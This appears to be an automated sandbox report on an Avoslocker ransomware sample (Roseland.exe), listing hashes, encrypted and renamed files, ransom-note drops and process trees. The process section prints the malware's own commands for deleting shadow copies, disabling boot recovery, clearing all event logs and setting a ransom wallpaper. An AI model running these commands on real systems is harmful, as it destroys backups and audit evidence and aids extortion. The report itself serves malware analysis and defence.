memory/2716-1767-0x00000000024B0000-0x0000000002530000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c9734dd629f10b384479160ed4046063
SHA1 4d98ef5d3cb709eaa6683d6c09c1c2317362b06b
SHA256 76c16a2766e8af4b622e6e5848a261ed37a9ff758c528037f5b15e5eceb60ce1
SHA512 144a8f3211ec7ca625e5f958a0caea2e7024f58a85e1cd57d0f32466b104e41cbcd97ce748f3d077bbc54bb9e6826aa788843f53043fe6f4f54057a9d1ed2b17

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FVFLMG0ZOJDG33R86VBG.temp

MD5 c9734dd629f10b384479160ed4046063
SHA1 4d98ef5d3cb709eaa6683d6c09c1c2317362b06b
SHA256 76c16a2766e8af4b622e6e5848a261ed37a9ff758c528037f5b15e5eceb60ce1
SHA512 144a8f3211ec7ca625e5f958a0caea2e7024f58a85e1cd57d0f32466b104e41cbcd97ce748f3d077bbc54bb9e6826aa788843f53043fe6f4f54057a9d1ed2b17

memory/2900-24595-0x000000001B160000-0x000000001B442000-memory.dmp

memory/2900-24597-0x0000000002290000-0x0000000002298000-memory.dmp

memory/2900-24596-0x0000000002500000-0x0000000002580000-memory.dmp

memory/2900-24598-0x0000000002500000-0x0000000002580000-memory.dmp

memory/2900-24599-0x0000000002500000-0x0000000002580000-memory.dmp

C:\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/2900-24601-0x0000000002500000-0x0000000002580000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1209476241.png

MD5 1524411f3d6138062f1bd5ab5d31338c
SHA1 49292962485c61cf2307b139b494da8512a52916
SHA256 d5e0fa9b4d02e1225dff1af879333969f9245e8a2820a1635130ffccb6b27dd2
SHA512 ec8346d0c0b5ebcf171eb8aaf02d41ad3785f1a6c39c9e16ec9c84fd857ccd8d59f4ab69df5c1a919eb1248af2929b61cd9ca7292091ffb09352234b6c3c4c55

Analysis: behavioral2

Detonation Overview

Submitted

2023-03-16 09:12

Reported

2023-03-16 09:14

Platform

win10v2004-20230220-en

Max time kernel

78s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\ExpandDebug.crw => C:\Users\Admin\Pictures\ExpandDebug.crw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\GroupDismount.crw => C:\Users\Admin\Pictures\GroupDismount.crw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\HideShow.crw => C:\Users\Admin\Pictures\HideShow.crw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\TraceBackup.png => C:\Users\Admin\Pictures\TraceBackup.png.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\UnprotectEdit.crw => C:\Users\Admin\Pictures\UnprotectEdit.crw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\80944880.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-il\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\share.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeWideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessDemoR_BypassTrial365-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ja.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\br.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\af_get.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Advertising.DATA C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview-hover.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-16_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailMediumTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\an\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Windows Media Player\es-ES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\delete.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSplashLogo.scale-400.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\meta\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare.HxS C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-tw\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_joined.gif C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTest-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugin.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-150.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Windows Security\BrowserCore\en-US\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTest-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fil_get.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarWideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\officemuiset.msi.16.en-us.boot.tree.dat C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\powerview.x-none.msi.16.x-none.boot.tree.dat C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Common Files\System\msadc\en-US\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\LanguageModel\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1480 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 3624 wrote to memory of 9584 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3624 wrote to memory of 9584 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1020 wrote to memory of 9652 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1020 wrote to memory of 9652 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1168 wrote to memory of 7900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1168 wrote to memory of 7900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1296 wrote to memory of 10380 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1296 wrote to memory of 10380 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1156 wrote to memory of 2796 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1156 wrote to memory of 2796 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1480 wrote to memory of 20972 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1480 wrote to memory of 20972 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 20972 wrote to memory of 19760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 20972 wrote to memory of 19760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 20972 wrote to memory of 19980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 20972 wrote to memory of 19980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Roseland.exe

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\80944880.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country Destination Domain Proto
